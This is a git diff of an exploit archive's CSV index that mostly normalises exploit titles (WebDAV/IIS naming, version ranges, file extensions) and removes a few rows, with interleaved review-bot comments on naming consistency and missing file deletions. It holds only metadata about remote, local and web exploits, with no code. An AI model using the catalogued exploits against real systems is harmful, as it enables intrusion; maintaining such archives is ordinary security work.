diff --git a/files.csv b/files.csv
index 7c27852a5..4505f8e6b 100755
--- a/files.csv
+++ b/files.csv
@@ -1,6 +1,6 @@
 id,file,description,date,author,platform,type,port
-1,platforms/windows/remote/1.c,"Microsoft Windows WebDAV - (ntdll.dll) Remote Exploit",2003-03-23,kralor,windows,remote,80
-2,platforms/windows/remote/2.c,"Microsoft Windows WebDAV - Remote PoC Exploit",2003-03-24,RoMaNSoFt,windows,remote,80
+1,platforms/windows/remote/1.c,"Microsoft Windows IIS WebDAV - 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
+2,platforms/windows/remote/2.c,"Microsoft Windows IIS 5.0 WebDAV - Remote PoC Exploit",2003-03-24,RoMaNSoFt,windows,remote,80
 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (Redhat) - ptrace/kmod Local Root Exploit",2003-03-30,"Wojciech Purczynski",linux,local,0
 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow Exploit",2003-04-01,Andi,solaris,local,0
 5,platforms/windows/remote/5.c,"Microsoft Windows RPC Locator Service - Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
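Review bot: The retitled rows 1 and 2 put the product in the order `Microsoft Windows IIS 5.0 WebDAV - …`, but the same commit retitles row 51 in the `@@ -49,7` hunk as `"Microsoft Windows WebDAV IIS 5.0 - Remote Root Exploit (3) (xwdav)"` and row 36 in the `@@ -34,7` hunk as `"Microsoft Windows WebDAV - Remote Root Exploit (2)"` with no IIS version at all, while rows 16470 and 22365-22368 further down follow the `Windows IIS 5.0 WebDAV` order. Since the commit appears to be normalising these titles, row 51 should read `"Microsoft Windows IIS 5.0 WebDAV - Remote Root Exploit (3) (xwdav)"`. Row 36 would take the same prefix if it targets the same IIS 5.0 WebDAV issue, which cannot be confirmed from the index alone.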
@@ -34,7 +34,7 @@ id,file,description,date,author,platform,type,port
 33,platforms/linux/remote/33.c,"WsMp3d 0.x - Remote Root Heap Overflow Exploit",2003-05-22,Xpl017Elz,linux,remote,8000
 34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 (Apache) Remote Exploit",2003-05-29,N/A,linux,remote,80
 35,platforms/windows/dos/35.c,"Microsoft Windows IIS 5.0 - 5.1 - Remote Denial of Service Exploit",2003-05-31,Shachank,windows,dos,0
-36,platforms/windows/remote/36.c,"Microsoft Windows WebDav II - Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80
+36,platforms/windows/remote/36.c,"Microsoft Windows WebDAV - Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80
 37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0
 38,platforms/linux/remote/38.pl,"Apache <= 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80
 39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Root Exploit",2003-06-10,gunzip,linux,remote,69
@@ -49,7 +49,7 @@ id,file,description,date,author,platform,type,port
 48,platforms/windows/remote/48.c,"Microsoft Windows Media Services - Remote Exploit (MS03-022)",2003-07-01,firew0rker,windows,remote,80
 49,platforms/linux/remote/49.c,"Linux eXtremail 1.5.x - Remote Format Strings Exploit",2003-07-02,B-r00t,linux,remote,25
 50,platforms/windows/remote/50.pl,"ColdFusion MX - Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80
-51,platforms/windows/remote/51.c,"Microsoft Windows WebDav III - Remote Root Exploit (xwdav)",2003-07-08,Schizoprenic,windows,remote,80
+51,platforms/windows/remote/51.c,"Microsoft Windows WebDAV IIS 5.0 - Remote Root Exploit (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80
 52,platforms/windows/local/52.asm,"ICQ Pro 2003a Password Bypass Exploit (ca1-icq.asm)",2003-07-09,"Caua Moura Prado",windows,local,0
 53,platforms/cgi/webapps/53.c,"CCBILL CGI - 'ccbillx.c' whereami.cgi Remote Exploit",2003-07-10,knight420,cgi,webapps,0
 54,platforms/windows/remote/54.c,"LeapFTP 2.7.x - Remote Buffer Overflow Exploit",2003-07-12,drG4njubas,windows,remote,21
@@ -645,7 +645,7 @@ id,file,description,date,author,platform,type,port
 819,platforms/windows/remote/819.py,"Savant Web Server 3.1 - Remote BoF (French Win OS support)",2005-02-15,"Jerome Athias",windows,remote,80
 820,platforms/php/webapps/820.php,"vBulletin <= 3.0.4 - 'forumdisplay.php' Code Execution (2)",2005-02-15,AL3NDALEEB,php,webapps,0
 822,platforms/windows/remote/822.c,"Serv-U 4.x - 'site chmod' Remote Buffer Overflow Exploit",2004-01-30,Skylined,windows,remote,21
-823,platforms/windows/remote/823.c,"Dream FTP 1.2 - Remote Format String Exploit",2004-02-11,Skylined,windows,remote,21
+823,platforms/windows/remote/823.c,"BolinTech Dream FTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String Exploit",2004-02-11,Skylined,windows,remote,21
 824,platforms/linux/local/824.c,"VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid) (updated)",2005-09-13,Qnix,linux,local,0
 825,platforms/windows/remote/825.c,"3Com Ftp Server 2.0 - Remote Overflow Exploit",2005-02-17,c0d3r,windows,remote,21
 826,platforms/linux/remote/826.c,"Medal of Honor Spearhead Server Remote Buffer Overflow (Linux)",2005-02-18,millhouse,linux,remote,12203
@@ -4175,7 +4175,7 @@ id,file,description,date,author,platform,type,port
 4527,platforms/php/webapps/4527.txt,"Softbiz Recipes Portal Script Remote SQL Injection Vulnerability",2007-10-13,"Khashayar Fereidani",php,webapps,0
 4528,platforms/php/webapps/4528.txt,"KwsPHP 1.0 mg2 Module Remote SQL Injection Vulnerability",2007-10-13,"Mehmet Ince",php,webapps,0
 4529,platforms/cgi/webapps/4529.txt,"WWWISIS <= 7.1 (IsisScript) Local File Disclosure / XSS Vulnerabilities",2007-10-13,JosS,cgi,webapps,0
-4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (webdav) - Remote File Disclosure Exploit",2007-10-14,eliteboy,multiple,remote,0
+4530,platforms/multiple/remote/4530.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure Exploit",2007-10-14,eliteboy,multiple,remote,0
 4531,platforms/windows/local/4531.py,"jetAudio 7.x (m3u File) Local SEH Overwrite Exploit",2007-10-14,h07,windows,local,0
 4532,platforms/linux/dos/4532.pl,"eXtremail <= 2.1.1 memmove() Remote Denial of Service Exploit",2007-10-15,mu-b,linux,dos,0
 4533,platforms/linux/remote/4533.c,"eXtremail <= 2.1.1 (LOGIN) Remote Stack Overflow Exploit",2007-10-15,mu-b,linux,remote,4501
@@ -4197,7 +4197,7 @@ id,file,description,date,author,platform,type,port
 4549,platforms/php/webapps/4549.txt,"PHP Project Management <= 0.8.10 - Multiple RFI / LFI Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0
 4550,platforms/php/webapps/4550.pl,"BBPortalS <= 2.0 - Remote Blind SQL Injection Exploit",2007-10-21,Max007,php,webapps,0
 4551,platforms/php/webapps/4551.txt,"PeopleAggregator <= 1.2pre6-release-53 - Multiple RFI Vulnerabilities",2007-10-21,GoLd_M,php,webapps,0
-4552,platforms/linux/remote/4552.pl,"Apache Tomcat (webdav) - Remote File Disclosure Exploit (ssl support)",2007-10-21,h3rcul3s,linux,remote,0
+4552,platforms/linux/remote/4552.pl,"Apache Tomcat (WebDAV) - Remote File Disclosure Exploit (SSL)",2007-10-21,h3rcul3s,linux,remote,0
 4553,platforms/windows/local/4553.php,"PHP 5.x - COM functions safe_mode and disable_function bypass",2007-10-22,shinnai,windows,local,0
 4554,platforms/php/webapps/4554.txt,"SocketMail 2.2.8 fnc-readmail3.php Remote File Inclusion Vulnerability",2007-10-22,BiNgZa,php,webapps,0
 4555,platforms/php/webapps/4555.txt,"TOWeLS 0.1 scripture.php Remote File Inclusion Vulnerability",2007-10-22,GoLd_M,php,webapps,0
@@ -8253,7 +8253,7 @@ id,file,description,date,author,platform,type,port
 8751,platforms/php/webapps/8751.txt,"bSpeak 1.10 (forumid) Remote Blind SQL Injection Vulnerability",2009-05-20,snakespc,php,webapps,0
 8752,platforms/php/webapps/8752.txt,"Jorp 1.3.05.09 - Remote Arbitrary Remove Projects/Tasks Vulnerabilities",2009-05-20,YEnH4ckEr,php,webapps,0
 8753,platforms/osx/remote/8753.txt,"Mac OS X - Java applet Remote Deserialization Remote PoC (Updated)",2009-05-20,"Landon Fuller",osx,remote,0
-8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0
+8754,platforms/windows/remote/8754.patch,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",windows,remote,0
 8755,platforms/php/webapps/8755.txt,"VICIDIAL 2.0.5-173 (Auth Bypass) SQL Injection Vulnerability",2009-05-21,Striker7,php,webapps,0
 8756,platforms/asp/webapps/8756.txt,"asp inline corporate calendar - (SQL/XSS) Multiple Vulnerabilities",2009-05-21,Bl@ckbe@rD,asp,webapps,0
 8757,platforms/windows/remote/8757.html,"BaoFeng (config.dll) ActiveX Remote Code Execution Exploit",2009-05-21,etirah,windows,remote,0
@@ -8263,7 +8263,7 @@ id,file,description,date,author,platform,type,port
 8762,platforms/php/webapps/8762.txt,"Article Directory (page.php) Remote Blind SQL Injection Vulnerability",2009-05-21,"ThE g0bL!N",php,webapps,0
 8763,platforms/php/webapps/8763.txt,"ZaoCMS Insecure Cookie Handling Vulnerability",2009-05-21,"ThE g0bL!N",php,webapps,0
 8764,platforms/php/webapps/8764.txt,"ZaoCMS (download.php) Remote File Disclosure Vulnerability",2009-05-21,"ThE g0bL!N",php,webapps,0
-8765,platforms/windows/remote/8765.php,"Microsoft IIS 6.0 WebDAV Remote Authentication Bypass Exploit (PHP)",2009-05-22,racle,windows,remote,0
+8765,platforms/windows/remote/8765.php,"Microsoft IIS 6.0 WebDAV - Remote Authentication Bypass Exploit (PHP)",2009-05-22,racle,windows,remote,0
 8766,platforms/php/webapps/8766.txt,"Tutorial Share <= 3.5.0 Insecure Cookie Handling Vulnerability",2009-05-22,Evil-Cod3r,php,webapps,0
 8767,platforms/windows/dos/8767.c,"Winamp 5.551 - MAKI Parsing Integer Overflow PoC",2009-05-22,n00b,windows,dos,0
 8769,platforms/php/webapps/8769.txt,"ZaoCMS (user_id) Remote SQL Injection Vulnerability",2009-05-22,Qabandi,php,webapps,0
@@ -13650,7 +13650,7 @@ id,file,description,date,author,platform,type,port
 15721,platforms/php/webapps/15721.txt,"Joomla Component Billy Portfolio 1.1.2 - Blind SQL Injection",2010-12-10,jdc,php,webapps,0
 15722,platforms/multiple/dos/15722.txt,"PHP 5.3.3 NumberFormatter::getSymbol Integer Overflow",2010-12-10,"Maksymilian Arciemowicz",multiple,dos,0
 15723,platforms/freebsd/remote/15723.c,"FreeBSD LiteSpeed Web Server 4.0.17 with PHP - Remote Exploit",2010-12-10,kingcope,freebsd,remote,0
-15803,platforms/windows/dos/15803.py,"Windows 7 IIS7.5 FTPSVC UNAUTH'D Remote DoS PoC",2010-12-21,"Matthew Bergin",windows,dos,0
+15803,platforms/windows/dos/15803.py,"Windows 7 IIS 7.5 - FTPSVC UNAUTH'D Remote DoS PoC",2010-12-21,"Matthew Bergin",windows,dos,0
 15725,platforms/linux/remote/15725.pl,"Exim 4.63 - Remote Root Exploit",2010-12-11,kingcope,linux,remote,0
 15727,platforms/windows/local/15727.py,"FreeAmp 2.0.7 - (.m3u) Buffer Overflow",2010-12-11,zota,windows,local,0
 15728,platforms/hardware/webapps/15728.txt,"Clear iSpot/Clearspot 2.0.0.0 - CSRF Vulnerabilities",2010-12-12,"Trustwave's SpiderLabs",hardware,webapps,0
@@ -14267,7 +14267,7 @@ id,file,description,date,author,platform,type,port
 16467,platforms/windows/remote/16467.rb,"Microsoft IIS/PWS CGI Filename Double Decode Command Execution",2011-01-08,metasploit,windows,remote,0
 16468,platforms/windows/remote/16468.rb,"Microsoft IIS 4.0 - (.htr) Path Overflow",2010-04-30,metasploit,windows,remote,0
 16469,platforms/windows/remote/16469.rb,"Microsoft IIS 5.0 Printer Host Header Overflow",2010-04-30,metasploit,windows,remote,0
-16470,platforms/windows/remote/16470.rb,"Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow",2010-07-25,metasploit,windows,remote,0
+16470,platforms/windows/remote/16470.rb,"Microsoft Windows IIS 5.0 WebDAV - ntdll.dll Path Overflow",2010-07-25,metasploit,windows,remote,0
 16471,platforms/windows/remote/16471.rb,"Microsoft IIS WebDAV Write Access Code Execution",2010-09-20,metasploit,windows,remote,0
 16472,platforms/windows/remote/16472.rb,"Microsoft IIS 5.0 IDQ Path Overflow",2010-06-15,metasploit,windows,remote,0
 16473,platforms/windows/remote/16473.rb,"Mercury/32 <= 4.01b - LOGIN Buffer Overflow",2010-06-22,metasploit,windows,remote,0
@@ -16239,7 +16239,7 @@ id,file,description,date,author,platform,type,port
 18760,platforms/windows/local/18760.rb,"xRadio 0.95b Buffer Overflow",2012-04-20,metasploit,windows,local,0
 18761,platforms/linux/remote/18761.rb,"Adobe Flash Player ActionScript Launch Command Execution Vulnerability",2012-04-20,metasploit,linux,remote,0
 18772,platforms/php/webapps/18772.txt,"Havalite CMS 1.0.4 - Multiple Vulnerabilities",2012-04-23,Vulnerability-Lab,php,webapps,0
-18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x Webdav File Reading Vulnerability",2012-04-22,"Jelmer Kuperus",multiple,remote,0
+18763,platforms/multiple/remote/18763.txt,"Liferay 6.0.x WebDAV - File Reading Vulnerability",2012-04-22,"Jelmer Kuperus",multiple,remote,0
 18764,platforms/windows/webapps/18764.txt,"Oracle GlassFish Server 3.1.1 (build 12) Multiple XSS",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0
 18765,platforms/windows/dos/18765.txt,"samsung net-i ware <= 1.37 - Multiple Vulnerabilities",2012-04-22,"Luigi Auriemma",windows,dos,0
 18766,platforms/windows/webapps/18766.txt,"Oracle GlassFish Server - REST CSRF",2012-04-22,"Roberto Suggi Liverani",windows,webapps,0
@@ -16436,7 +16436,7 @@ id,file,description,date,author,platform,type,port
 19011,platforms/php/webapps/19011.txt,"Webspell FIRSTBORN Movie-Addon - Blind SQL Injection Vulnerability",2012-06-08,"Easy Laster",php,webapps,0
 19028,platforms/linux/remote/19028.txt,"Berkeley Sendmail 5.58 DEBUG Vulnerability",1988-08-01,anonymous,linux,remote,0
 19031,platforms/php/webapps/19031.txt,"Webspell dailyinput Movie Addon 4.2.x SQL Injection Vulnerability",2012-06-10,"Easy Laster",php,webapps,0
-19033,platforms/windows/remote/19033.txt,"Microsoft iis 6.0 and 7.5 - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0
+19033,platforms/windows/remote/19033.txt,"Microsoft IIS 6.0 and 7.5 (+ PHP) - Multiple Vulnerabilities",2012-06-10,kingcope,windows,remote,0
 19034,platforms/windows/dos/19034.cpp,"PEamp (.mp3) Memory Corruption PoC",2012-06-10,Ayrbyte,windows,dos,0
 19035,platforms/php/webapps/19035.txt,"freepost 0.1 r1 - Multiple Vulnerabilities",2012-06-10,"ThE g0bL!N",php,webapps,0
 19036,platforms/php/webapps/19036.php,"WordPress Content Flow 3D Plugin 1.0.0 - Arbitrary File Upload",2012-06-10,g11tch,php,webapps,0
@@ -19612,10 +19612,10 @@ id,file,description,date,author,platform,type,port
 22362,platforms/linux/local/22362.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Vulnerability (1)",2003-03-17,anszom@v-lo.krakow.pl,linux,local,0
 22363,platforms/linux/local/22363.c,"Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Vulnerability (2)",2003-04-10,"Wojciech Purczynski",linux,local,0
 22364,platforms/cgi/webapps/22364.c,"Outblaze Webmail - Cookie Authentication Bypass Vulnerability",2003-03-17,"dong-h0un U",cgi,webapps,0
-22365,platforms/windows/remote/22365.pl,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (1)",2003-03-24,mat,windows,remote,0
-22366,platforms/windows/remote/22366.c,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (2)",2003-03-31,ThreaT,windows,remote,0
-22367,platforms/windows/remote/22367.txt,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (3)",2003-04-04,"Morning Wood",windows,remote,0
-22368,platforms/windows/remote/22368.txt,"Microsoft Windows XP/2000/NT 4 ntdll.dll Buffer Overflow Vulnerability (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0
+22365,platforms/windows/remote/22365.pl,"Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (1)",2003-03-24,mat,windows,remote,0
+22366,platforms/windows/remote/22366.c,"Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (2)",2003-03-31,ThreaT,windows,remote,0
+22367,platforms/windows/remote/22367.txt,"Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (3)",2003-04-04,"Morning Wood",windows,remote,0
+22368,platforms/windows/remote/22368.txt,"Microsoft Windows XP/2000/NT 4 IIS 5.0 WebDAV - ntdll.dll Buffer Overflow Vulnerability (4)",2003-03-17,aT4r@3wdesign.es,windows,remote,0
 22369,platforms/linux/remote/22369.txt,"Ximian Evolution 1.x UUEncoding Parsing Memory Corruption Vulnerability",2003-03-17,"Core Security",linux,remote,0
 22370,platforms/linux/dos/22370.txt,"Ximian Evolution 1.x - UUEncoding Denial of Service Vulnerability",2003-03-17,"Core Security",linux,dos,0
 22371,platforms/linux/remote/22371.txt,"Ximian Evolution 1.x - MIME image/* Content-Type Data Inclusion Vulnerability",2003-03-19,"Core Security",linux,remote,0
@@ -20874,7 +20874,6 @@ id,file,description,date,author,platform,type,port
 23658,platforms/linux/local/23658.c,"Linux VServer Project 1.2x - CHRoot Breakout Vulnerability",2004-02-06,"Markus Mueller",linux,local,0
 23659,platforms/cgi/webapps/23659.txt,"OpenJournal 2.0 - Authentication Bypassing Vulnerability",2004-02-06,"Tri Huynh",cgi,webapps,0
 23660,platforms/windows/dos/23660.c,"BolinTech Dream FTP Server 1.0 User Name Format String Vulnerability (1)",2004-02-07,shaun2k2,windows,dos,0
-23661,platforms/windows/remote/23661.c,"BolinTech Dream FTP Server 1.0 User Name Format String Vulnerability (2)",2004-02-07,Skylined,windows,remote,0
 23662,platforms/linux/dos/23662.c,"Nadeo Game Engine Remote Denial of Service Vulnerability",2004-02-09,scrap,linux,dos,0
 23663,platforms/php/webapps/23663.txt,"PHP-Nuke 6.x/7.0 - 'News' Module Cross-Site Scripting Vulnerability",2004-02-09,"Janek Vind",php,webapps,0
 23664,platforms/windows/dos/23664.py,"Sambar Server 6.0 Results.STM Post Request Buffer Overflow Vulnerability",2004-02-09,nd@felinemenace.org,windows,dos,0
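Review bot: Row 23661 is dropped from the index in the `@@ -20874` hunk and row 23765 in the `@@ -20968` hunk, but the only `deleted file` section in view is `platforms/php/webapps/28221.pl` (matching the row removed in the `@@ -25279` hunk); nothing in this chunk removes `platforms/windows/remote/23661.c` or `platforms/solaris/local/23765.c`. The file sections are emitted in path order and the chunk ends after `platforms/php`, so those deletions may follow further down; if they do not, the index and the tree will disagree for those two ids. Row 23660 also keeps its `(1)` suffix after its `(2)` counterpart is removed; if 23661 is being folded into the retitled row 823 (`@@ -645` hunk), the surviving description would read more cleanly as `"BolinTech Dream FTP Server 1.0 User Name Format String Vulnerability"`.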
@@ -20968,7 +20967,6 @@ id,file,description,date,author,platform,type,port
 23762,platforms/windows/dos/23762.c,"RhinoSoft Serv-U FTP Server 3/4/5 MDTM Command Time Argument Buffer Overflow Vulnerability (3)",2004-02-26,shaun2k2,windows,dos,0
 23763,platforms/windows/remote/23763.c,"RhinoSoft Serv-U FTP Server 3/4/5 MDTM Command Time Argument Buffer Overflow Vulnerability (4)",2004-02-26,lion,windows,remote,0
 23764,platforms/hardware/remote/23764.txt,"Symantec Gateway Security 5400 Series 2.0 Error Page Cross-Site Scripting Vulnerability",2004-02-26,Soby,hardware,remote,0
-23765,platforms/solaris/local/23765.c,"Sun Solaris 8/9 - Unspecified Passwd Local Root Compromise Vulnerability",2004-02-27,"Marco Ivaldi",solaris,local,0
 23766,platforms/windows/remote/23766.html,"Microsoft Internet Explorer 5/6 - Cross-Domain Event Leakage Vulnerability",2004-02-27,iDefense,windows,remote,0
 23767,platforms/php/webapps/23767.txt,"Invision Power Board 1.3 - Multiple Cross-Site Scripting Vulnerabilities",2004-03-01,"Rafel Ivgi The-Insider",php,webapps,0
 23768,platforms/windows/remote/23768.txt,"Microsoft Internet Explorer 6.0 window.open Media Bar Cross-Zone Scripting Vulnerability",2003-09-11,Jelmer,windows,remote,0
@@ -25279,7 +25277,6 @@ id,file,description,date,author,platform,type,port
 28218,platforms/php/webapps/28218.txt,"Koobi Pro 5.6 showtopic Module toid Parameter XSS",2006-07-13,"Evampire chiristof",php,webapps,0
 28219,platforms/php/webapps/28219.txt,"Koobi Pro 5.6 showtopic Module toid Parameter SQL Injection",2006-07-13,"Evampire chiristof",php,webapps,0
 28220,platforms/linux/dos/28220.txt,"KDE Konqueror 3.5.x ReplaceChild Denial of Service Vulnerability",2006-07-14,hdm,linux,dos,0
-28221,platforms/php/webapps/28221.pl,"Invision Power Board 2.1.x IPSClass.PHP SQL Injection Vulnerability (1)",2006-07-13,1dt.w0lf,php,webapps,0
 28222,platforms/windows/dos/28222.txt,"Microsoft Works 8.0 Spreadsheet - Multiple Vulnerabilities",2006-06-14,"Benjamin Franz",windows,dos,0
 28223,platforms/php/webapps/28223.txt,"Subberz Lite UserFunc Remote File Include Vulnerability",2006-07-14,"Chironex Fleckeri",php,webapps,0
 28224,platforms/windows/remote/28224.c,"Microsoft PowerPoint 2003 mso.dll PPT Processing Unspecified Code Execution",2006-07-14,"naveed afzal",windows,remote,0
@@ -25475,7 +25472,7 @@ id,file,description,date,author,platform,type,port
 28421,platforms/windows/dos/28421.htm,"Microsoft Internet Explorer 6.0 - Multiple COM Object Color Property Denial of Service Vulnerabilities",2006-08-21,XSec,windows,dos,0
 28422,platforms/php/webapps/28422.txt,"DieselScripts Diesel Paid Mail Getad.PHP Cross-Site Scripting Vulnerability",2006-08-21,night_warrior771,php,webapps,0
 28423,platforms/php/webapps/28423.txt,"RedBlog 0.5 Index.PHP Remote File Include Vulnerability",2006-08-22,Root3r_H3ll,php,webapps,0
-28424,platforms/linux/remote/28424.txt,"Apache 2.x HTTP Server Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0
+28424,platforms/linux/remote/28424.txt,"Apache HTTP Server (<= 1.3.35 / <= 2.0.58 / <= 2.2.2) - Arbitrary HTTP Request Headers Security Weakness",2006-08-24,"Thiago Zaninotti",linux,remote,0
 28425,platforms/solaris/local/28425.txt,"Sun Solaris 8/9 UCB/PS Command Local Information Disclosure Vulnerability",2006-03-27,anonymous,solaris,local,0
 28426,platforms/php/webapps/28426.txt,"Headline Portal Engine 0.x/1.0 HPEInc Parameter Multiple Remote File Include Vulnerabilities",2006-08-21,"the master",php,webapps,0
 28427,platforms/novell/local/28427.pl,"Novell Identity Manager Arbitrary Command Execution Vulnerability",2006-08-18,anonymous,novell,local,0
@@ -27760,7 +27757,7 @@ id,file,description,date,author,platform,type,port
 30832,platforms/windows/dos/30832.html,"Yahoo! Toolbar 1.4.1 Helper Class ActiveX Control Remote Buffer Overflow Denial of Service Vulnerability",2007-11-29,"Elazar Broad",windows,dos,0
 30833,platforms/hardware/remote/30833.html,"F5 Networks FirePass 4100 SSL VPN My.Logon.PHP3 - Cross-Site Scripting Vulnerability",2007-11-30,"Richard Brain",hardware,remote,0
 30834,platforms/hardware/remote/30834.txt,"F5 Networks FirePass 4100 SSL VPN Download_Plugin.PHP3 - Cross-Site Scripting Vulnerability",2007-11-10,"Adrian Pastor",hardware,remote,0
-30835,platforms/unix/remote/30835.sh,"Apache HTTP Server <= 2.2.4 413 Error HTTP Request Method Cross-Site Scripting Weakness",2007-11-30,"Adrian Pastor",unix,remote,0
+30835,platforms/unix/remote/30835.sh,"Apache HTTP Server <= 2.2.4 - 413 Error HTTP Request Method Cross-Site Scripting Weakness",2007-11-30,"Adrian Pastor",unix,remote,0
 30836,platforms/php/webapps/30836.txt,"bcoos 1.0.10 Adresses/Ratefile.PHP SQL Injection Vulnerability",2007-11-30,Lostmon,php,webapps,0
 30837,platforms/linux/dos/30837.txt,"QEMU 0.9 Translation Block Local Denial of Service Vulnerability",2007-11-30,TeLeMan,linux,dos,0
 30838,platforms/multiple/remote/30838.html,"Safari 1.x/3.0.x_Firefox 1.5.0.x/2.0.x JavaScript Multiple Fields Key Filtering Vulnerability",2007-12-01,"Carl Hardwick",multiple,remote,0
@@ -28214,7 +28211,7 @@ id,file,description,date,author,platform,type,port
 31326,platforms/php/webapps/31326.txt,"Flyspray 0.9.9 - Information Disclosure/HTML Injection/Cross-Site Scripting",2008-03-03,"Digital Security Research Group",php,webapps,0
 31327,platforms/multiple/dos/31327.txt,"Borland StarTeam 2008 10.0.57 - Multiple Remote Vulnerabilities",2008-03-03,"Luigi Auriemma",multiple,dos,0
 31328,platforms/php/webapps/31328.txt,"TorrentTrader 1.08 - 'msg' Parameter HTML Injection Vulnerability",2008-03-03,Dominus,php,webapps,0
-31329,platforms/multiple/webapps/31329..txt,"MediaWiki 1.22.1 PdfHandler - Remote Code Execution Exploit",2014-02-01,@u0x,multiple,webapps,0
+31329,platforms/multiple/webapps/31329.txt,"MediaWiki 1.22.1 PdfHandler - Remote Code Execution Exploit",2014-02-01,@u0x,multiple,webapps,0
 31337,platforms/php/webapps/31337.txt,"WebCT 4.1.5 - Email and Discussion Board Messages HTML Injection Vulnerability",2007-06-25,Lupton,php,webapps,0
 31338,platforms/windows/dos/31338.txt,"Perforce Server 2007.3 - Multiple Remote Denial of Service Vulnerabilities",2008-03-05,"Luigi Auriemma",windows,dos,0
 31339,platforms/php/webapps/31339.txt,"PHP-Nuke Yellow_Pages Module - 'cid' Parameter SQL Injection Vulnerability",2008-03-05,ZoRLu,php,webapps,0
@@ -32189,7 +32186,7 @@ id,file,description,date,author,platform,type,port
 35732,platforms/multiple/local/35732.py,"Ntpdc 4.2.6p3 - Local Buffer Overflow",2015-01-08,drone,multiple,local,0
 35733,platforms/php/webapps/35733.txt,"vBulletin MicroCART 1.1.4 - Arbitrary File(s) Deletion/SQL Injection/XSS",2015-01-09,Technidev,php,webapps,80
 35734,platforms/php/webapps/35734.txt,"ZAPms 1.22 'nick' Parameter SQL Injection Vulnerability",2011-05-09,KedAns-Dz,php,webapps,0
-35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.x XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0
+35735,platforms/multiple/remote/35735.txt,"Apache Struts 2.0.0 <= 2.2.1.1 - XWork 's:submit' HTML Tag Cross Site Scripting Vulnerability",2011-05-10,"Dr. Marian Ventuneac",multiple,remote,0
 35736,platforms/php/webapps/35736.txt,"poMMo Aardvark PR16.1 Multiple Cross Site Scripting Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0
 35737,platforms/php/webapps/35737.txt,"Calendarix 0.8.20080808 Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2011-05-10,"High-Tech Bridge SA",php,webapps,0
 35738,platforms/linux/dos/35738.php,"Apache 1.4/2.2.x APR 'apr_fnmatch()' Denial of Service Vulnerability",2011-05-12,"Maksymilian Arciemowicz",linux,dos,0
@@ -35346,7 +35343,7 @@ id,file,description,date,author,platform,type,port
 39094,platforms/php/webapps/39094.txt,"Rips Scanner 0.5 - (code.php) Local File Inclusion",2015-12-24,"Ashiyane Digital Security Team",php,webapps,80
 39100,platforms/php/webapps/39100.txt,"WordPress NextGEN Gallery Plugin 'jqueryFileTree.php' Directory Traversal Vulnerability",2014-02-19,"Tom Adams",php,webapps,0
 39101,platforms/php/webapps/39101.php,"MODx Evogallery Module 'uploadify.php' Arbitrary File Upload Vulnerability",2014-02-18,"TUNISIAN CYBER",php,webapps,0
-39102,platforms/windows/local/39102..py,"EasyCafe Server <= 2.2.14 Remote File Read",2015-12-26,R-73eN,windows,local,0
+39102,platforms/windows/local/39102.py,"EasyCafe Server <= 2.2.14 - Remote File Read",2015-12-26,R-73eN,windows,local,0
 39103,platforms/windows/dos/39103.txt,"AccessDiver 4.301 - Buffer Overflow",2015-12-26,hyp3rlinx,windows,dos,0
 39106,platforms/asp/webapps/39106.txt,"eshtery CMS 'FileManager.aspx' Local File Disclosure Vulnerability",2014-02-22,peng.deng,asp,webapps,0
 39107,platforms/php/webapps/39107.txt,"ATutor Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2014-02-22,HauntIT,php,webapps,0
@@ -35394,8 +35391,8 @@ id,file,description,date,author,platform,type,port
 39227,platforms/hardware/remote/39227.txt,"FingerTec Fingerprint Reader - Remote Access and Remote Enrollment",2016-01-12,"Daniel Lawson",hardware,remote,0
 39149,platforms/lin_x86-64/shellcode/39149.c,"x64 Linux Bind TCP Port Shellcode",2016-01-01,Scorpion_,lin_x86-64,shellcode,0
 39150,platforms/php/webapps/39150.txt,"Open Audit SQL Injection Vulnerability",2016-01-02,"Rahul Pratap Singh",php,webapps,0
